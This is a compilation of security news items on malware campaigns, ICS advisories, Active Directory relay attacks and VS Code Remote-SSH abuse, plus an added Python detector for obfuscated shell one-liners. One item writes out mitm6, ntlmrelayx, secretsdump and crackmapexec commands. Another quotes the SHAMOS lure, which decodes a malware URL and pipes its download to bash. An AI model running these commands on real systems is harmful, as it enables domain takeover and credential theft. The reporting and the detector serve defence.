  • Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that has been used in email spam campaigns since November 2024 to deliver an array of next-stage payloads, ranging from information stealers to remote access trojans. Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT,

  • As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing

  • Cybersecurity researchers are highlighting a dangerous attack technique that combines rogue IPv6 configuration with NTLM credential relay to achieve complete Active Directory domain compromise, exploiting default Windows configurations that most organizations leave unchanged.

    Attack Leverages Default Windows IPv6 Behavior

    The MITM6 + NTLM Relay attack exploits Windows systems’ automatic DHCPv6 requests, even in networks that […]

    The post MITM6 + NTLM Relay Attack Enables Full Domain Compromise appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • CISA issued four comprehensive Industrial Control Systems (ICS) advisories on August 19, 2025, highlighting serious vulnerabilities affecting critical infrastructure sectors including energy and manufacturing.

    These advisories detail exploitable vulnerabilities with CVSS scores ranging from 5.8 to 9.8, requiring immediate attention from system administrators and security professionals.

    Key Takeaways
    1. CISA issued four ICS advisories for Siemens, Tigo Energy, and EG4 systems affecting critical infrastructure.
    2. Critical vulnerabilities (CVSS up to 9.8) enable remote attacks and system compromise.
    3. Update immediately - Apply vendor patches and implement network segmentation.

    Critical Siemens Vulnerabilities 

    Two significant Siemens advisories were released addressing distinct attack vectors. Advisory ICSA-25-231-01 covers the Desigo CC Product Family and SENTRON Powermanager, identifying a least privilege violation (CWE-272) vulnerability tracked as CVE-2025-47809 with a CVSS v3.1 score of 8.2. 

    This vulnerability affects Wibu CodeMeter components across multiple product versions (V5.0 through V8), enabling privilege escalation through the CodeMeter Control Center component immediately after installation.

    The second Siemens advisory, ICSA-25-231-02, addresses the Mendix SAML Module with a more severe improper verification of cryptographic signature (CWE-347) vulnerability. 

    CVE-2025-40758 carries a CVSS v3.1 score of 8.7 and enables unauthenticated remote attackers to hijack accounts in specific Single Sign-On (SSO) configurations.

    The vulnerability affects multiple Mendix versions, with patches available requiring updates to V3.6.21, V4.0.3, or V4.1.2 depending on the deployment.

    Tigo and EG4 Infrastructure Vulnerabilities

    The energy sector faces particularly severe threats with two advisories targeting solar energy infrastructure. 

    ICSA-25-217-02 addresses Tigo Energy’s Cloud Connect Advanced devices with three critical vulnerabilities: hard-coded credentials (CWE-798), command injection (CWE-77), and predictable PRNG seeds (CWE-337). 

    CVE-2025-7768 received the highest CVSS v4 score of 9.3, while CVE-2025-7769 and CVE-2025-7770 both scored 8.7.

    EG4 Electronics inverters, covered in advisory ICSA-25-219-07, present four distinct vulnerabilities including cleartext transmission (CWE-319), firmware integrity issues (CWE-494), observable discrepancies (CWE-203), and authentication bypass (CWE-307). 

    The most critical, CVE-2025-46414, achieved a CVSS v4 score of 9.2, though EG4 deployed server-side fixes for some vulnerabilities in April 2025.

    Mitigations

    Siemens’ mitigations require updating CodeMeter to version 8.30a and enabling the UseEncryption configuration for the SAML module.

    Tigo Energy is developing comprehensive fixes, while EG4 has implemented server-side patches and plans new hardware releases by October 15, 2025.

    CISA emphasizes implementing defense-in-depth strategies, including network segmentation, VPN-secured remote access, and firewall isolation. 

    Organizations should prioritize impact analysis and risk assessment before deploying defensive measures, while monitoring for suspicious activity and reporting incidents to CISA for correlation analysis. 

    No public exploitation has been reported for these specific vulnerabilities, providing a critical window for remediation efforts.

    The post CISA Releases Four ICS Advisories Surrounding Vulnerabilities, and Exploits appeared first on Cyber Security News.

  • Researchers at Push Security have discovered a new phishing campaign that targets Microsoft 365 (M365) systems and uses Active Directory Federation Services (ADFS) to enable credential theft. This attack vector exploits Microsoft’s authentication redirect mechanisms, effectively turning a legitimate service into a conduit for phishing operations.

    Sophisticated Phishing Infrastructure

    The campaign begins with malvertising lures […]

    The post New Campaign Uses Active Directory Federation Services to Steal M365 Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Security researchers at Imperva have disclosed a critical pre-handshake memory exhaustion vulnerability in the widely-used LSQUIC QUIC implementation that enables remote attackers to crash servers through denial-of-service attacks. The flaw, designated CVE-2025-54939 and dubbed “QUIC-LEAK,” bypasses standard QUIC connection-level protections by triggering before any handshake is established, leaving servers vulnerable to unbounded memory growth and […]

    The post QUIC-LEAK Vulnerability Allows Attackers to Drain Server Memory and Cause DoS appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Resecurity has documented a sophisticated attack chain that combines MITM6 with NTLM relay techniques to achieve full Active Directory domain compromise.

    The attack exploits Windows’ default IPv6 auto-configuration behavior, allowing attackers to escalate from network access to Domain Admin privileges in minutes. 

    Key Takeaways
    1. Abuses Windows IPv6 auto-config and AD's 10-machine account quota for domain compromise.
    2. Uses mitm6 + ntlmrelayx to create malicious accounts with RBCD to reach Domain Admin quickly.
    3. Fix: Disable IPv6, set ms-DS-MachineAccountQuota = 0, enable signing, deploy DHCPv6 Guard.

    This technique poses significant risks to organizations running standard Windows environments, as it leverages built-in protocols rather than requiring malware or zero-day exploits.

    IPv6 Auto-Configuration Attack

    Resecurity reports that the MITM6 attack targets a fundamental Windows behavior: automatic DHCPv6 requests sent when systems boot or connect to networks. 

    Even in organizations not actively using IPv6, Windows machines prioritize IPv6 configuration over IPv4, creating an exploitable attack surface.

    Attackers deploy the mitm6 tool to act as a rogue DHCPv6 server, responding to these requests and assigning malicious DNS server addresses to victim machines. 

    The command sudo mitm6 -d target.local --no-ra establishes the attacker as the authoritative DNS server for the target domain.

    Attack chain

    The attack chain continues with ntlmrelayx from the Impacket toolkit, which intercepts NTLM authentication attempts through WPAD (Web Proxy Auto-Discovery Protocol) spoofing. 

    The tool executes: sudo impacket-ntlmrelayx -ts -6 -t ldaps://target.local -wh fakewpad --add-computer --delegate-access, creating malicious computer accounts and configuring Resource-Based Constrained Delegation (RBCD).

    “Active Directory’s default ms-DS-MachineAccountQuota setting allows any authenticated user to add up to 10 machine accounts, enabling attackers to create controlled computer objects,” reads the report.

    These accounts can then modify their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, allowing impersonation of privileged accounts, including Domain Administrators.

    Recommendations

    The attack’s impact extends far beyond initial network compromise. Once successful, attackers can extract NTLM hashes using secretsdump.py “target.local/User:Password@target.local” and conduct lateral movement with tools like CrackMapExec: crackmapexec smb 10.0.0.1/8 -u administrator -H 1f937b21e2e0ada0d3d3f7cf58c8aade --share.

    Take Control of Compromised Machines

    Organizations face severe consequences, including full domain compromise, credential theft, service disruption, and potential data exfiltration. 

    The attack’s stealthy nature makes detection challenging, as it abuses legitimate Windows protocols.

    Critical mitigation strategies include disabling IPv6 when not required, setting ms-DS-MachineAccountQuota = 0 to prevent unauthorized computer account creation, and enforcing SMB and LDAP signing to prevent relay attacks. 

    Network-level defenses should implement DHCPv6 Guard on switches and routers to block unauthorized IPv6 advertisements.

    This attack demonstrates how default configurations can create significant security vulnerabilities, emphasizing the need for proactive hardening of Active Directory environments and continuous monitoring for rogue network services.

    The post New MITM6 + NTLM Relay Attack Let Attackers Escalate Privileges and Compromise Entire Domain appeared first on Cyber Security News.

  • A sophisticated malware campaign targeting macOS users emerged between June and August 2025, in which attackers attempted to compromise over 300 customer environments through deceptive help websites.

    The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER, which operates this information stealer as malware-as-a-service for rent to other cybercriminals.

    The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as “macos flush resolver cache,” only to encounter promoted malvertising websites in their search results.

    These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.

    The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.

    CrowdStrike researchers identified that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.

    However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.

    Search engine results with promoted malvertising website (Source – CrowdStrike)

    The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.

    Google advertising profile (Source – CrowdStrike)

    Infection Mechanism and Technical Implementation

    The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:

    curl -fsSL $(echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d) | bash

    This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server.

    The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.

    Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection.

    The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.

    The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.

    SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.

    The malware packages stolen data into a ZIP archive named “out.zip” and exfiltrates it using curl commands to remote servers.

    Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.
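    As an added example (not code from the CrowdStrike report or this article), the following Python detector flags the lure’s two tell-tale traits in collected shell command lines: a base64 literal decoded inside a command substitution, and a download piped straight into a shell. The sample command lines are constructed; the first is the one-liner quoted above, and the regexes and scoring are this example’s own assumptions, not a CrowdStrike detection.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample telemetry, shaped like shell command lines an EDR or a
# shell-history collector would record. Entry 0 is the obfuscated one-liner
# from the article; the rest are benign look-alikes that must not be flagged.
SAMPLE_COMMANDS = [
    'curl -fsSL $(echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d) | bash',
    'curl -fsSL https://example.com/install.sh -o install.sh',
    'echo aGVsbG8= | base64 -d',
    'dscacheutil -flushcache; sudo killall -HUP mDNSResponder',
]

# A base64 literal fed to a decoder inside $( ... ) or backtick substitution.
_B64_SUBST = re.compile(
    r'(?:\$\(|`)\s*echo\s+["\']?([A-Za-z0-9+/=]{16,})["\']?\s*\|\s*base64\s+(?:-d|-D|--decode)\b'
)
# A download utility whose output is piped directly into a shell interpreter.
_PIPE_TO_SHELL = re.compile(r'\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z|)sh\b')


def decode_hidden_url(command: str) -> Optional[str]:
    """Return the URL hidden in a base64 command substitution, or None."""
    m = _B64_SUBST.search(command)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode('utf-8')
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.startswith(('http://', 'https://')) else None


def defang(url: str) -> str:
    """Render a recovered URL non-clickable for inclusion in reports."""
    return url.replace('.', '[.]')


def classify(command: str) -> dict:
    """Score one command line: both traits together match the SHAMOS lure."""
    hidden = decode_hidden_url(command)
    pipe_to_shell = bool(_PIPE_TO_SHELL.search(command))
    if hidden and pipe_to_shell:
        verdict = 'malicious'
    elif hidden or pipe_to_shell:
        verdict = 'suspicious'   # one trait alone is worth a look, not an alert
    else:
        verdict = 'benign'
    return {'command': command, 'verdict': verdict,
            'url': defang(hidden) if hidden else None}


def scan(commands: list) -> list:
    """Return findings for every command line that is not benign."""
    return [r for r in (classify(c) for c in commands) if r['verdict'] != 'benign']


if __name__ == '__main__':
    for f in scan(SAMPLE_COMMANDS):
        print(f"{f['verdict']:<10} {f['url'] or '-':<48} {f['command']}")
```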

    The post New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials appeared first on Cyber Security News.

  • Federal authorities have charged a 22-year-old Oregon man with operating one of the most powerful distributed denial-of-service (DDoS) botnets ever discovered, marking a significant victory in the ongoing battle against cybercriminal infrastructure. Ethan Foltz of Eugene, Oregon, faces federal charges for allegedly developing and administering the “Rapper Bot” DDoS-for-hire service, which has been conducting large-scale […]

    The post 22-year-old Operator of ‘Rapper Bot’ Botnet Charged for Launching 3 Tbps DDoS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A critical security vulnerability has been discovered in Microsoft’s VS Code Remote-SSH extension that allows attackers to execute malicious code on developers’ local machines through compromised remote servers. 

    Security researchers have demonstrated how this attack, dubbed “Vibe Hacking,” exploits the inherent trust relationship between remote development environments and local machines, affecting both VS Code and popular forks like Cursor.

    The vulnerability stems from a dangerous misconception among developers who believe remote development environments provide complete isolation. 

    Key Takeaways
    1. VS Code Remote-SSH extension allows attackers to execute malicious code on developers' local machines.
    2. Attackers use built-in commands to open local terminals and automatically run arbitrary code.
    3. Developers expose their workstations to compromise when connecting to untrusted servers.

    However, once a server is compromised, attackers can easily pivot to the developer’s local machine through the Remote-SSH extension’s built-in functionality.

    Exploiting Built-in Commands

    Calif reports that the attack leverages two specific VS Code commands that operate within the default configuration settings. 

    Malicious extensions on compromised servers can execute the workbench.action.terminal.newLocal command to open a terminal directly on the developer’s local machine, bypassing the remote environment entirely.

    Attack Chain

    Once the local terminal is established, attackers deploy the workbench.action.terminal.sendSequence command to send arbitrary text sequences to the terminal. 

    By appending a newline character, the malicious code executes automatically as if the developer had pressed Enter. This technique effectively transforms the trusted development environment into a command-and-control channel, reads the report.

    The attack works seamlessly because the Remote-SSH extension inherently trusts communications from the remote server. 

    When developers connect to what they believe is an isolated sandbox environment, they unknowingly expose their local machines to potential compromise.

    Mitigation Strategies

    Microsoft has acknowledged these risks on the Remote-SSH extension marketplace page, warning that “a compromised remote could use the VS Code Remote connection to execute code on your local machine”. 

    However, this warning has not prevented widespread adoption of remote development practices, particularly for AI agent deployment and testing.

    Security researchers suggest implementing user approval mechanisms when remote extensions attempt to open local terminals or send keystrokes to active terminals. 

    Monitoring the ~/.cursor-server directory for unauthorized changes can provide limited protection, though this approach offers minimal security if servers are fully compromised.

    The vulnerability highlights the need for secure-by-default designs in development tools that don’t rely on users making complex trust decisions. 

    As remote development continues growing in popularity, addressing these fundamental security issues becomes increasingly critical for protecting developer workstations from sophisticated supply chain attacks.

    The post Microsoft VS Code Remote-SSH Extension Hacked to Execute Malicious Code on Developer’s Machine appeared first on Cyber Security News.
